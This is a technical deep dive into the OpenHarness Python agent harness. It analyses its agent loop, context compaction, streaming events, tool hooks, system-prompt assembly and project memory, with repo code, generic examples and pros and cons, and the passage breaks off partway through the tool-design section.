HKUDS/OpenHarness — A Deep Dive into Harness Techniques
An ohmo personal agent integrating Feishu/Slack/Telegram/Discord. 30 techniques, with real code from the repo, pros/cons, and reference articles.

1. OpenHarness Overview
HKUDS/OpenHarness is an open-source Python implementation that replicates (and extends) the architecture of Claude Code. Its short self-description in pyproject.toml: "Open-source Python port of Claude Code - an AI-powered CLI coding assistant". The repo publishes two main CLIs: openharness/oh/openh for the coding agent, and ohmo for the personal agent with messaging integrations.
This report analyzes the OpenHarness harness — the layers of "scaffolding" around the LLM call that turn a bare model into a coding agent that can run in a terminal, orchestrate subagents, handle channel messaging, and run CI automatically. The scope covers 7 themes across 15+ subsystems:
- engine/ — agent loop (query.py, 805 LOC), stream events, cost tracker
- tools/ — 42 tools (Bash, Read, Edit, Grep, WebFetch, Task...) + Pydantic base
- permissions/ — 3-mode checker, sensitive path protection, path rules
- hooks/, plugins/, skills/, mcp/ — 4 extension surfaces
- memory/, prompts/ — per-project memory + multi-layer system prompt
- swarm/, coordinator/ — subprocess multi-agent with git worktree + mailbox (unique vs opencode)
- channels/, services/, sandbox/, tasks/, autopilot/ — Slack/Feishu/Telegram/Discord bus, LSP AST, Docker sandbox, cron, repo autopilot (unique vs opencode)
What is a harness?
The coding-agent community increasingly uses "harness" as shorthand for everything that is not the model — that is: Agent = Model + Harness. Harness engineering is a subset of context engineering, centered on managing the context window, tool orchestration, state persistence, error recovery, verification, safety, and lifecycle.
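The equation Agent = Model + Harness can be made concrete with a toy loop — a hedged sketch with entirely hypothetical names (run_harness, model_fn), not OpenHarness code. Everything except the single model_fn call is harness: orchestration, error recovery, and lifecycle.

```python
# Toy "Agent = Model + Harness" sketch. All names are hypothetical.
# The model is exactly one function call; the rest is harness.
def run_harness(model_fn, tools, history, max_turns=5):
    for _ in range(max_turns):
        reply = model_fn(history)                 # the model
        calls = reply.get("tool_calls", [])
        if not calls:                             # lifecycle: natural stop
            return reply["text"]
        results = []
        for name, args in calls:                  # tool orchestration
            try:
                results.append(tools[name](**args))
            except Exception as exc:              # error recovery
                results.append(f"error: {exc}")
        history.append({"role": "tool", "content": results})
    return "max turns reached"                    # lifecycle: hard stop
```

Each subsystem analyzed below (compaction, hooks, permissions, truncation) slots into one of these harness lines in the real implementation.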
Overall architecture
Tech stack
| Layer | Technology | Notes |
|---|---|---|
| Runtime | Python ≥3.10 | asyncio throughout, Pydantic v2 strict |
| Language | Python | mypy strict, ruff lint (line length 100) |
| AI SDKs | Anthropic ≥0.40 + OpenAI ≥1.0 | Provider abstraction via api_client |
| CLI | Typer ≥0.12 | Subcommand layout |
| TUI | Rich + Textual ≥0.80 + React Ink | Dual TUI: Python native + React-based |
| Validation | Pydantic v2 | Tool input models generate JSON schema |
| HTTP | httpx ≥0.27 + websockets ≥12 | Async; Feishu WebSocket long-connection |
| MCP | mcp ≥1.0 (Python SDK) | stdio + HTTP transport |
| Channels | slack-sdk, discord.py, python-telegram-bot, lark-oapi | 4 bot SDKs first-class |
| Cron | croniter ≥2.0 + watchfiles | Persistent job scheduler |
| Sandbox | Docker SDK (optional) | Tool execution isolation |
Summary table of the 30 techniques
| ID | Technique | Theme |
|---|---|---|
| T1 | Async ReAct + branching single/parallel tool execution | Loop |
| T2 | Auto-compact before-turn + reactive on overflow | Loop |
| T3 | Stream events union + CompactProgressEvent 9-phase | Loop |
| T4 | Pre/Post tool hook interception | Loop |
| T5 | Tool metadata carryover across turns | Loop |
| T6 | Multi-layer system prompt assembly (9 sections) | Context |
| T7 | CLAUDE.md cascading discovery upward | Context |
| T8 | Per-project memory isolation (SHA1 hash) | Context |
| T9 | Token-based memory search + CJK tokenizer | Context |
| T10 | Pydantic tool base + auto JSON schema | Tool |
| T11 | Per-tool output truncation + UTF-8 normalization | Tool |
| T12 | Bash interactive preflight + PTY + graceful timeout | Tool |
| T13 | Ripgrep-first Glob/Grep + Python fallback | Tool |
| T14 | Markdown skill system + frontmatter | Ecosystem |
| T15 | Hook lifecycle (6 events · 4 types · hot reload) | Ecosystem |
| T16 | Plugin manifest-based loading | Ecosystem |
| T17 | MCP stdio + HTTP + dynamic Pydantic adapter | Ecosystem |
| T18 | 3-mode permission (DEFAULT / PLAN / FULL_AUTO) | Permission |
| T19 | Built-in sensitive path protection (hardcoded glob) | Permission |
| T20 | 6-layer hierarchical permission evaluation | Permission |
| T21 | Async interactive approval + UUID + 300s timeout | Permission |
| T22 | Subprocess-based subagent spawning | Swarm ★ |
| T23 | File-based async mailbox with atomic writes | Swarm ★ |
| T24 | Dual-channel permission sync protocol | Swarm ★ |
| T25 | Git worktree isolation per agent | Swarm ★ |
| T26 | YAML agent definitions + coordinator | Swarm ★ |
| T27 | Multi-channel bus (Slack/Feishu/Discord/Telegram/Matrix) | Integrations ★ |
| T28 | LSP-based code intelligence via Python AST | Integrations ★ |
| T29 | Docker sandbox for tool execution | Integrations ★ |
| T30 | Cron scheduler + persistent background tasks | Integrations ★ |
★ = feature unique to OpenHarness (absent from opencode core). Total: 9 unique techniques, 21 techniques that share ideas with opencode/Claude Code but are implemented in Python idiom.
A. Agent Loop & Streaming — 5 techniques
The engine is the heart of the OpenHarness harness: engine/query.py (805 LOC) contains the run_query coroutine — an async generator that emits stream events for the UI. The interesting parts: the loop branches between sequential (1 tool) and parallel (2+ tools via asyncio.gather) execution, auto-compacts right before each turn, intercepts tools with pre/post hooks, and carries tool metadata over across multiple compactions.
T1. Async ReAct loop with single/parallel tool branching
A.1 · src/openharness/engine/query.py · Function: run_query() · Lines: 516–651

Code from OpenHarness:

```python
turn_count = 0
while context.max_turns is None or turn_count < context.max_turns:
    turn_count += 1
    # --- auto-compact check before calling the model ---------------
    async for event, usage in _stream_compaction(trigger="auto"):
        yield event, usage
    messages, was_compacted = last_compaction_result

    final_message: ConversationMessage | None = None
    async for event in context.api_client.stream_message(
        ApiMessageRequest(
            model=context.model,
            messages=messages,
            system_prompt=context.system_prompt,
            tools=context.tool_registry.to_api_schema())):
        if isinstance(event, ApiTextDeltaEvent):
            yield AssistantTextDelta(text=event.text), None
        elif isinstance(event, ApiMessageCompleteEvent):
            final_message = event.message

    if not final_message.tool_uses:
        return  # natural end of turn

    tool_calls = final_message.tool_uses
    if len(tool_calls) == 1:
        # Single tool: sequential (stream events immediately)
        tc = tool_calls[0]
        yield ToolExecutionStarted(tool_name=tc.name, tool_input=tc.input), None
        result = await _execute_tool_call(context, tc.name, tc.id, tc.input)
        yield ToolExecutionCompleted(
            tool_name=tc.name, output=result.content, is_error=result.is_error), None
        tool_results = [result]
    else:
        # Multiple tools: execute concurrently, emit events after
        for tc in tool_calls:
            yield ToolExecutionStarted(tool_name=tc.name, tool_input=tc.input), None
        # return_exceptions=True avoids orphan tool_use blocks
        raw_results = await asyncio.gather(
            *[_run(tc) for tc in tool_calls], return_exceptions=True
        )
        # wrap exceptions into ToolResultBlock(is_error=True)
        ...
    messages.append(ConversationMessage(role="user", content=tool_results))
```

asyncio.gather cuts latency. The most important detail is return_exceptions=True: if one tool raises, the others are not cancelled. The reason is carefully commented in the repo: the Anthropic API rejects the next request if any tool_use lacks a corresponding tool_result.

Code example (generic):
```python
async def run_agent_turn(messages, tools):
    resp = await llm.call(messages, tools)
    if not resp.tool_uses:
        return resp
    if len(resp.tool_uses) == 1:
        tc = resp.tool_uses[0]
        results = [await exec_tool(tc)]
    else:
        # CRITICAL: return_exceptions=True —
        # otherwise a failed tool leaves siblings cancelled
        # → orphan tool_use blocks → next API call rejected
        raw = await asyncio.gather(
            *[exec_tool(tc) for tc in resp.tool_uses],
            return_exceptions=True,
        )
        results = [wrap_exception(tc, r) for tc, r in zip(resp.tool_uses, raw)]
    messages.append({"role": "user", "content": results})
    return results
```
Pros
- Parallel execution cuts latency when tools are independent (read 3 files at once)
- The single-tool path still streams events in realtime — no UX delay
- return_exceptions=True guards against the orphan tool_use bug
- async-native, no thread pool needed
Cons
- Parallel race conditions if tools edit the same file — no ordering is enforced
- Unbounded concurrency with many tool calls → can overload disk/API
- Hidden side effects are hard to debug when tools interleave
- No mechanism to cancel/timeout the whole turn like opencode's Effect.Stream
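The last two cons — unbounded concurrency and the missing whole-turn timeout — can be mitigated with a semaphore plus asyncio.wait_for. A hedged sketch, not OpenHarness code; gather_bounded and its parameters are hypothetical:

```python
import asyncio

async def gather_bounded(coros, limit=4, turn_timeout=120.0):
    """Run tool coroutines with a concurrency cap and an overall deadline.

    Exceptions are returned in-place (like return_exceptions=True), so no
    sibling is cancelled and every tool_use still gets a tool_result.
    """
    sem = asyncio.Semaphore(limit)

    async def guarded(coro):
        async with sem:
            try:
                return await coro
            except Exception as exc:  # keep siblings alive
                return exc

    return await asyncio.wait_for(
        asyncio.gather(*(guarded(c) for c in coros)),
        timeout=turn_timeout,
    )
```

Note that on a turn-level timeout the gather is cancelled wholesale, so the caller still has to synthesize error tool_results for every pending tool_use before retrying.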
T2. Auto-compact before-turn + reactive on overflow
A.2 · src/openharness/engine/query.py · Lines: 519–562 · Service: services/compact/ · Constant: AUTOCOMPACT_BUFFER_TOKENS = 13_000

Code from OpenHarness:

```python
# 1. Before-turn auto-compact
async for event, usage in _stream_compaction(trigger="auto"):
    yield event, usage
messages, was_compacted = last_compaction_result

# 2. Reactive compact when the provider returns prompt-too-long
except Exception as exc:
    error_msg = str(exc)
    if not reactive_compact_attempted and _is_prompt_too_long_error(exc):
        reactive_compact_attempted = True
        yield StatusEvent(message=REACTIVE_COMPACT_STATUS_MESSAGE), None
        async for event, usage in _stream_compaction(trigger="reactive", force=True):
            yield event, usage
        messages, was_compacted = last_compaction_result
        if was_compacted:
            continue  # retry the turn with compacted messages

# 3. services/compact/microcompact.py — cheap, fast first pass
#    Drop stale ToolResultBlock content (keep tool_use structure)
# 4. services/compact/summary.py — LLM summarize when microcompact is not enough
# 5. services/compact/ptl_retry.py — truncate_head_for_ptl_retry()
#    last-chance head truncation when reactive compaction still overflows
```

Code example (generic):
```python
class CompactionOrchestrator:
    async def maybe_compact(self, messages, trigger="auto"):
        estimate = self.token_counter.estimate(messages)
        if estimate < self.threshold:
            return messages, False
        # Phase 1: cheap — drop old ToolResultBlock content only
        pruned = self.microcompact(messages)
        if self.token_counter.estimate(pruned) < self.threshold:
            return pruned, True
        # Phase 2: expensive — LLM summarize
        summary = await self.llm_summarize(pruned)
        return [system_prompt, summary] + pruned[-5:], True

    async def run_turn(self, messages):
        messages, _ = await self.maybe_compact(messages)
        try:
            return await llm.call(messages)
        except PromptTooLongError:
            messages, _ = await self.maybe_compact(messages, trigger="reactive")
            return await llm.call(messages)  # one retry
```
Pros
- Three graceful tiers — cheap first, expensive later
- Long sessions survive without user intervention
- Reactive fallback when the token estimate is wrong
- Progress events let the UI show that compaction is running
Cons
- LLM summarization risks losing important information
- The 13k buffer is arbitrary — not tuned per model
- Head truncation can delete system hints / CLAUDE.md context
- If the second reactive attempt fails, the agent dies (no third fallback)
T3. Streaming events union + CompactProgressEvent 9-phase
A.3 · src/openharness/engine/stream_events.py · Lines: entire file

Code from OpenHarness:

```python
from dataclasses import dataclass
from typing import Literal, Union

# 7 event types yielded from run_query()
@dataclass(frozen=True)
class AssistantTextDelta:
    text: str

@dataclass(frozen=True)
class AssistantTurnComplete:
    message: ConversationMessage
    usage: UsageSnapshot

@dataclass(frozen=True)
class ToolExecutionStarted:
    tool_name: str
    tool_input: dict

@dataclass(frozen=True)
class ToolExecutionCompleted:
    tool_name: str
    output: object
    is_error: bool

@dataclass(frozen=True)
class StatusEvent:
    message: str

@dataclass(frozen=True)
class ErrorEvent:
    message: str

@dataclass(frozen=True)
class CompactProgressEvent:
    phase: Literal[
        "hooks_start",
        "context_collapse_start",
        "context_collapse_end",
        "session_memory_start",
        "session_memory_end",
        "compact_start",
        "compact_retry",
        "compact_end",
        "compact_failed",
    ]
    message: str

StreamEvent = Union[
    AssistantTextDelta, AssistantTurnComplete, ToolExecutionStarted,
    ToolExecutionCompleted, StatusEvent, ErrorEvent, CompactProgressEvent,
]
```

Instead of untyped dict[str, Any], OpenHarness uses a tagged union of @dataclass(frozen=True) types. The Rich/Textual UI pattern-matches each event type with isinstance() — mypy strict guarantees no case is missed. The most notable event is CompactProgressEvent with its 9 phases: the UI can show a detailed progress bar (collapsing context → saving memory → summarizing → done/fail) instead of a bare "compacting...". This level of observability is rare in a Python port.

Code example (generic):
```python
from typing import Union, Literal
from dataclasses import dataclass

@dataclass(frozen=True)
class TextDelta:
    text: str

@dataclass(frozen=True)
class ToolStart:
    tool: str
    input: dict

@dataclass(frozen=True)
class ToolEnd:
    tool: str
    output: str
    error: bool

Event = Union[TextDelta, ToolStart, ToolEnd]

async def render_events(gen):
    async for ev in gen:
        match ev:
            case TextDelta(text):
                console.print(text, end="")
            case ToolStart(tool, _):
                ui.mark_tool(tool, "running")
            case ToolEnd(tool, _, error):
                ui.mark_tool(tool, "error" if error else "done")
```
Pros
- Type-safe: mypy strict catches missed cases
- UI logic decoupled from the engine
- CompactProgressEvent's 9 phases → detailed UX during compaction
- Easy to serialize to JSON for remote UIs
Cons
- Adding an event type requires updates in many places (engine + UI + tests)
- Frozen dataclasses are immutable → no "accumulation" (a new object per delta)
- No ID linking parent-child events (tool_start ↔ tool_end must be matched by tool_name)
T4. Pre/Post tool hook interception
A.4 · src/openharness/engine/query.py · Function: _execute_tool_call() · Lines: 654–720

Code from OpenHarness:

```python
async def _execute_tool_call(
    context: QueryContext,
    tool_name: str,
    tool_use_id: str,
    tool_input: dict[str, object],
) -> ToolResultBlock:
    # ---- PRE_TOOL_USE hook ----
    if context.hook_executor is not None:
        pre_hooks = await context.hook_executor.execute(
            HookEvent.PRE_TOOL_USE,
            {"tool_name": tool_name, "tool_input": tool_input,
             "event": HookEvent.PRE_TOOL_USE.value},
        )
        if pre_hooks.blocked:
            return ToolResultBlock(
                tool_use_id=tool_use_id,
                content=pre_hooks.reason or f"pre_tool_use hook blocked {tool_name}",
                is_error=True,
            )

    # ---- Actual tool execution ----
    result = await context.tool_registry.execute(tool_name, tool_input, ...)

    # ---- POST_TOOL_USE hook (observation only, cannot block) ----
    if context.hook_executor is not None:
        await context.hook_executor.execute(
            HookEvent.POST_TOOL_USE,
            {"tool_name": tool_name, "tool_input": tool_input,
             "tool_result": result.content, "is_error": result.is_error},
        )
    return result
```

Hooks enable policies such as blocking git push after 6pm, logging bash commands to a SIEM, or validating Edit patterns. A PRE hook can set blocked=True → short-circuiting into a ToolResultBlock error (the LLM sees it as an ordinary tool failure and self-adjusts). POST hooks only observe — they cannot undo an execution that has already finished. The design mirrors Claude Code hooks (see code.claude.com/docs/en/hooks).

Code example (generic):
```python
class HookExecutor:
    async def execute(self, event: HookEvent, payload: dict) -> HookResult:
        blocked = False
        reason = None
        for hook in self.hooks.get(event, []):
            res = await hook.run(payload)
            if res.blocked:
                blocked = True
                reason = res.reason
                break
        return HookResult(blocked=blocked, reason=reason)

# Usage inside tool execution
async def run_tool(name, args):
    pre = await hooks.execute(HookEvent.PRE_TOOL_USE, {"tool_name": name, "args": args})
    if pre.blocked:
        return {"error": pre.reason or "blocked by hook"}
    result = await tool.execute(args)
    await hooks.execute(HookEvent.POST_TOOL_USE, {"tool_name": name, "result": result})
    return result
```
Pros
- Policy separated from the permission system — two layers of protection
- PRE can block; POST can audit/log
- Hot-reload of hooks via HookReloader watching mtime
- Shell/Prompt/HTTP/Agent hook types — versatile
Cons
- Hooks run synchronously in the hot path → latency on every tool call
- Prompt hooks call an LLM → cost + races with the main loop
- No "retry with modified args" — only block or pass
- A misconfigured hook can leave the agent stuck and hard to debug
T5. Tool metadata carryover across turns
A.5 · src/openharness/engine/query.py · Lines: 146–250 · Struct: QueryContext (deque-based tracking)

Code from OpenHarness:

```python
from collections import deque

@dataclass
class QueryContext:
    # Recent work tracking — persisted across compaction rounds
    recent_goals: deque[str] = field(default_factory=lambda: deque(maxlen=5))
    recent_reads: deque[str] = field(default_factory=lambda: deque(maxlen=6))
    active_artifacts: deque[str] = field(default_factory=lambda: deque(maxlen=8))
    async_agent_tasks: deque[AgentTaskRef] = field(default_factory=lambda: deque(maxlen=12))
    work_log: deque[WorkLogEntry] = field(default_factory=lambda: deque(maxlen=10))
    ...

# Updated on every ToolExecutionCompleted:
def record_tool_execution(ctx: QueryContext, tc: ToolUseBlock, result: ToolResultBlock):
    if tc.name == "Read":
        path = tc.input.get("file_path")
        if path:
            ctx.recent_reads.append(path)
    elif tc.name == "Write" or tc.name == "Edit":
        path = tc.input.get("file_path")
        if path:
            ctx.active_artifacts.append(path)
    elif tc.name == "Task":
        ctx.async_agent_tasks.append(AgentTaskRef(id=..., status="pending"))
    ctx.work_log.append(WorkLogEntry(tool=tc.name, ts=time.time(), ok=not result.is_error))

# When compaction happens, these deques get injected into the summary:
# "Recently read: path1, path2, ..."
# "Active artifacts: draft.md, report.html, ..."
# "Pending subagents: task-abc (status=running), ..."
```

The small maxlen values (5, 6, 8, 10, 12) keep everything bounded — the deques can never overflow on their own.

Code example (generic):
```python
from collections import deque

class AgentMemory:
    def __init__(self):
        self.recent_goals = deque(maxlen=5)
        self.recent_reads = deque(maxlen=6)
        self.active_artifacts = deque(maxlen=8)
        self.pending_tasks = deque(maxlen=12)

    def on_tool(self, name, args, ok):
        if name == "Read":
            self.recent_reads.append(args["file_path"])
        elif name in ("Write", "Edit"):
            self.active_artifacts.append(args["file_path"])
        elif name == "Task":
            self.pending_tasks.append(args["id"])

    def summary_block(self) -> str:
        return (
            f"Recent files read: {', '.join(self.recent_reads)}\n"
            f"Active artifacts: {', '.join(self.active_artifacts)}\n"
            f"Pending subagents: {', '.join(self.pending_tasks)}"
        )

# Inject into the compact summary prompt:
compact_msg = f"Previous conversation summary: ...\n\n{memory.summary_block()}"
```
Pros
- Reduces "amnesia" after compaction
- Bounded deques → predictable memory
- Structured metadata → easy to render in the UI
- Can be injected into the system prompt every turn (not only on compact)
Cons
- Tracking logic is hard-coded per tool — must be updated when tools are added
- Records "what" but not "why" — the agent knows it read X but not the reason
- Deque maxlen is arbitrary — very long sessions still overflow
- May duplicate info already present in the LLM-generated summary
B. Context & Memory — 4 techniques
OpenHarness splits context into 3 layers: (1) the system prompt — assembled dynamically each turn from 9 sections; (2) CLAUDE.md — local per-project rules, cascading from cwd up to the root; (3) persistent memory — file-based per-project notes, searched against the current query. Unlike opencode, OpenHarness has its own long-term memory store (MEMORY.md), whereas opencode relies only on AGENTS.md/CLAUDE.md.
T6. Multi-layer system prompt assembly (9 sections)
B.1 · src/openharness/prompts/context.py · Function: build_system_prompt() · Lines: 74–158

Code from OpenHarness:

```python
def build_system_prompt(ctx: PromptContext) -> str:
    sections: list[str] = []
    # 1. Base role — persona + operating principles
    sections.append(BASE_PROMPT)
    # 2. Environment — cwd, platform, python, git branch, model
    sections.append(_build_env_section(ctx))
    # 3. Effort + reasoning passes (thinking mode hint)
    if ctx.effort:
        sections.append(_build_effort_section(ctx.effort, ctx.passes))
    # 4. Skills — discovered skills injected as "tools-of-tools"
    if ctx.skills:
        sections.append(_build_skills_section(ctx.skills))
    # 5. Delegation — when subagents are available
    if ctx.subagent_definitions:
        sections.append(_build_delegation_section(ctx.subagent_definitions))
    # 6. CLAUDE.md — cascading from cwd to root
    if ctx.claudemd_content:
        sections.append(f"# Local project rules (CLAUDE.md)\n{ctx.claudemd_content}")
    # 7. Local rules (.claude/rules/*.md)
    if ctx.local_rules:
        sections.append(_build_local_rules(ctx.local_rules))
    # 8. Issue/PR context (when running in GitHub autopilot)
    if ctx.issue_or_pr:
        sections.append(_build_issue_section(ctx.issue_or_pr))
    # 9. Relevant memories (top-k from memory search)
    if ctx.relevant_memories:
        sections.append(_build_memories_section(ctx.relevant_memories))
    return "\n\n---\n\n".join(sections)
```

The prompt is rebuilt every turn: when ctx.claudemd_content changes, the prompt changes; when the memory search returns new hits, the memories section differs. The ordering is cache-aware: stable sections (1–5) come first, volatile sections (6–9) last → Anthropic prefix caching still hits for the head and only the tail is invalidated.

Code example (generic):
```python
@dataclass
class PromptContext:
    cwd: Path
    model: str
    effort: str | None
    claudemd_content: str | None
    subagent_definitions: list[AgentDef]
    relevant_memories: list[MemoryHeader]

def build_system_prompt(ctx: PromptContext) -> str:
    parts = [
        BASE_ROLE,                                  # 1. stable
        build_env(ctx),                             # 2. stable per session
        build_effort(ctx.effort),                   # 3. stable per mode
        build_subagents(ctx.subagent_definitions),  # 4. stable
        build_claudemd(ctx.claudemd_content),       # 5. changes when cwd changes
        build_memories(ctx.relevant_memories),      # 6. changes every turn
    ]
    return "\n\n---\n\n".join(p for p in parts if p)
```
Pros
- Modular — each section can be tested in isolation
- Cache-aware ordering (stable first, dynamic last)
- Explicit conditions — sections are skipped when there is no data
- The --- delimiter helps the LLM parse section boundaries
Cons
- 9 sections → the system prompt can get very long (10k+ tokens)
- Rebuilt every turn → prompt caching is fragile if the cache key is not stable
- No per-section token budget — a large CLAUDE.md can dominate
- Section order is hard-coded, hard to customize
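The missing per-section budget could be retrofitted with a small allocator that clamps each section before joining. A hypothetical sketch (apply_section_budgets and its rough 4-chars-per-token heuristic are assumptions, not repo code):

```python
def apply_section_budgets(sections, budgets, chars_per_token=4):
    """Clamp each prompt section to a token budget (approximated by chars).

    `sections` maps section name -> text; `budgets` maps name -> max tokens.
    Sections without an entry in `budgets` pass through untouched.
    """
    out = {}
    for name, text in sections.items():
        max_tokens = budgets.get(name)
        if max_tokens is None:
            out[name] = text
            continue
        limit = max_tokens * chars_per_token
        if len(text) <= limit:
            out[name] = text
        else:
            # Keep the head; a marker tells the LLM content was cut.
            out[name] = text[:limit] + f"\n... [section '{name}' truncated]"
    return out
```

Budgeting CLAUDE.md and memories while leaving the base role unbounded would prevent a single oversized project file from crowding out the rest of the prompt.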
T7. CLAUDE.md cascading discovery upward
B.2 · src/openharness/prompts/claudemd.py · Function: discover_claudemd() · Lines: 8–48 · Truncate: 12000 chars/file

Code from OpenHarness:

```python
def discover_claudemd(cwd: Path, *, max_chars: int = 12000) -> str:
    collected: list[tuple[Path, str]] = []
    seen: set[Path] = set()
    # Walk upward from cwd to filesystem root
    current = cwd.resolve()
    while True:
        for candidate in (
            current / "CLAUDE.md",
            current / ".claude" / "CLAUDE.md",
        ):
            if candidate.exists() and candidate not in seen:
                seen.add(candidate)
                content = candidate.read_text(encoding="utf-8", errors="replace")
                if len(content) > max_chars:
                    content = content[:max_chars] + f"\n\n... [truncated at {max_chars} chars]"
                collected.append((candidate, content))
        # Also collect .claude/rules/*.md at each level
        rules_dir = current / ".claude" / "rules"
        if rules_dir.is_dir():
            for rule in sorted(rules_dir.glob("*.md")):
                if rule not in seen:
                    seen.add(rule)
                    collected.append((rule, rule.read_text(...)))
        if current.parent == current:
            break  # reached root
        current = current.parent
    # Reverse so root-level rules come first, leaf rules last (last wins)
    collected.reverse()
    return "\n\n".join(f"## {p.relative_to(cwd) if ...}\n\n{c}" for p, c in collected)
```

Code example (generic):
```python
def find_up(cwd: Path, filenames: list[str]) -> list[Path]:
    """Walk upward from cwd to root, collecting matching files."""
    found, seen = [], set()
    current = cwd.resolve()
    while True:
        for name in filenames:
            p = current / name
            if p.exists() and p not in seen:
                seen.add(p)
                found.append(p)
        if current.parent == current:
            break
        current = current.parent
    return found

def assemble_rules(cwd: Path) -> str:
    files = find_up(cwd, ["CLAUDE.md", ".claude/CLAUDE.md", "AGENTS.md"])
    # Root-first so leaf overrides (last-wins)
    files.reverse()
    return "\n\n".join(f.read_text()[:12000] for f in files)
```
Pros
- Monorepo-friendly — rules per sub-package
- Dedup by path — CLAUDE.md + .claude/CLAUDE.md never duplicated
- Per-file truncation → predictable size
- Last-wins like .gitignore — a familiar mental model
Cons
- Walking up to the root can read files outside the project (home dir)
- No semantic merge — just concatenation
- Truncation cuts mid-sentence and can corrupt markdown
- Does not respect .gitignore for the rules dir
T8. Per-project memory isolation with SHA1 hash
B.3 · src/openharness/memory/paths.py · Function: get_project_memory_dir() · Lines: 11–22

Code from OpenHarness:

```python
from hashlib import sha1
from pathlib import Path
from openharness.config.paths import get_data_dir

def get_project_memory_dir(cwd: str | Path) -> Path:
    """Return the persistent memory directory for a project."""
    path = Path(cwd).resolve()
    digest = sha1(str(path).encode("utf-8")).hexdigest()[:12]
    memory_dir = get_data_dir() / "memory" / f"{path.name}-{digest}"
    memory_dir.mkdir(parents=True, exist_ok=True)
    return memory_dir

def get_memory_entrypoint(cwd: str | Path) -> Path:
    """Return the project memory entrypoint file."""
    return get_project_memory_dir(cwd) / "MEMORY.md"

# Result: ~/.openharness/memory/{project-name}-{sha1[:12]}/
# ├── MEMORY.md        ← entrypoint (index)
# ├── architecture.md  ← topic memory
# ├── api-design.md
# └── ...
```

Two projects with the same name (e.g. app) at different paths will not mix memories. SHA1 of the absolute path → unique, yet still readable because the dir name also contains path.name. File-based (no DB) → portable; users can back up/copy/inspect it by hand. MEMORY.md is the index file — the other topic files are linked from it (like an Obsidian vault).

Code example (generic):
```python
from hashlib import sha1
from pathlib import Path

def project_memory_dir(cwd: Path, data_root: Path) -> Path:
    """Stable, collision-resistant dir per project path."""
    abs_path = cwd.resolve()
    digest = sha1(str(abs_path).encode()).hexdigest()[:12]
    d = data_root / "memory" / f"{abs_path.name}-{digest}"
    d.mkdir(parents=True, exist_ok=True)
    return d

# Usage
mem_dir = project_memory_dir(Path.cwd(), Path.home() / ".myagent")
# → ~/.myagent/memory/app-a3f8b7c1d2e5/
```
Pros
- Zero collisions between same-named projects
- Readable — the dir name contains the project name
- File-based → trivial to back up/version
- Lazy mkdir — nothing is created until needed
Cons
- Moving the project (mv /a → /b) → memory is "lost" because the hash changes
- SHA1 needs no crypto strength here; it was chosen for simplicity — a new dev may wonder "who is attacking?"
- A 12-char digest can still collide (roughly 1 in ~10^14) on very large systems
- The project name in the dir can leak sensitive info
T9. Token-based memory search with CJK support
B.4 · src/openharness/memory/search.py · Function: find_relevant_memories() · Lines: 12–49

Code from OpenHarness:

```python
def find_relevant_memories(query: str, cwd, *, max_results=5) -> list[MemoryHeader]:
    tokens = _tokenize(query)
    if not tokens:
        return []
    scored: list[tuple[float, MemoryHeader]] = []
    for header in scan_memory_files(cwd, max_files=100):
        meta = f"{header.title} {header.description}".lower()
        body = header.body_preview.lower()
        # Metadata matches weighted 2x; body matches 1x.
        meta_hits = sum(1 for t in tokens if t in meta)
        body_hits = sum(1 for t in tokens if t in body)
        score = meta_hits * 2.0 + body_hits
        if score > 0:
            scored.append((score, header))
    # Rank by score desc, then recency desc (tie-break)
    scored.sort(key=lambda item: (-item[0], -item[1].modified_at))
    return [header for _, header in scored[:max_results]]

def _tokenize(text: str) -> set[str]:
    """Extract search tokens, handling ASCII + Han ideographs."""
    # ASCII word tokens (3+ chars) — filter out stopwords like "the"
    ascii_tokens = {t for t in re.findall(r"[A-Za-z0-9_]+", text.lower()) if len(t) >= 3}
    # Han ideographs (each character carries independent meaning)
    han_chars = set(re.findall(r"[\u4e00-\u9fff\u3400-\u4dbf]", text))
    return ascii_tokens | han_chars
```

Code example (generic):
```python
import re

def tokenize(text: str) -> set[str]:
    ascii_tok = {t for t in re.findall(r"\w+", text.lower()) if len(t) >= 3}
    han_tok = set(re.findall(r"[\u4e00-\u9fff]", text))
    return ascii_tok | han_tok

def rank_memories(query: str, memories, k=5):
    q_tokens = tokenize(query)
    scored = []
    for m in memories:
        meta_hits = sum(1 for t in q_tokens if t in m.meta.lower())
        body_hits = sum(1 for t in q_tokens if t in m.body.lower())
        score = meta_hits * 2.0 + body_hits
        if score:
            scored.append((score, m.modified_at, m))
    scored.sort(key=lambda t: (-t[0], -t[1]))
    return [m for _, _, m in scored[:k]]
```
Pros
- Zero infrastructure (no embedding service)
- CJK-aware — Chinese/Japanese/Korean work out of the box
- Metadata weighting rewards well-annotated memories
- Recency tie-break — newer memories come first
Cons
- No semantic understanding (synonyms, translations)
- Max 100 files scanned — scales poorly
- Stopword filtering is naive (length ≥3 only)
- Vietnamese does not tokenize correctly with diacritics
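The Vietnamese weakness could be mitigated by folding diacritics before matching, so "triển khai" and "trien khai" hit the same token. A sketch assuming both the query and the memory text pass through the same fold (fold_diacritics and tokenize_vi are hypothetical names, not repo code):

```python
import re
import unicodedata

def fold_diacritics(text: str) -> str:
    """Strip combining marks so accented and plain forms match.

    NFD decomposition splits base letters from combining accents; dropping
    category-Mn codepoints leaves plain letters. 'đ' needs a manual mapping
    because it is a distinct letter, not base + combining mark.
    """
    text = text.replace("đ", "d").replace("Đ", "D")
    decomposed = unicodedata.normalize("NFD", text)
    return "".join(c for c in decomposed if unicodedata.category(c) != "Mn")

def tokenize_vi(text: str) -> set[str]:
    # Same shape as the repo tokenizer, but diacritic-insensitive.
    folded = fold_diacritics(text.lower())
    return {t for t in re.findall(r"[a-z0-9_]+", folded) if len(t) >= 3}
```

The trade-off: folding loses tone distinctions (e.g. "ma" vs "mà"), so precision drops slightly in exchange for much better recall on mixed accented/unaccented notes.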
C. Tool Design — 4 techniques
OpenHarness ships 42 tools (the tools/ folder, one file per tool). A Pydantic base class guarantees type safety and auto-generates JSON schema for the Anthropic/OpenAI SDKs. Each tool has its own truncation limit, bash is protected by a preflight check + PTY, and Glob/Grep prefer ripgrep.
T10. Pydantic tool base + auto JSON schema
C.1 · src/openharness/tools/base.py · Lines: 30–52

Code from OpenHarness:

```python
from abc import ABC, abstractmethod
from typing import ClassVar
from pydantic import BaseModel

class BaseTool(ABC):
    name: ClassVar[str]
    description: ClassVar[str]
    input_model: ClassVar[type[BaseModel]]
    is_read_only: ClassVar[bool] = False

    @classmethod
    def to_schema(cls) -> dict:
        """JSON Schema auto-generated from Pydantic input model."""
        return {
            "name": cls.name,
            "description": cls.description,
            "input_schema": cls.input_model.model_json_schema(),
        }

    @abstractmethod
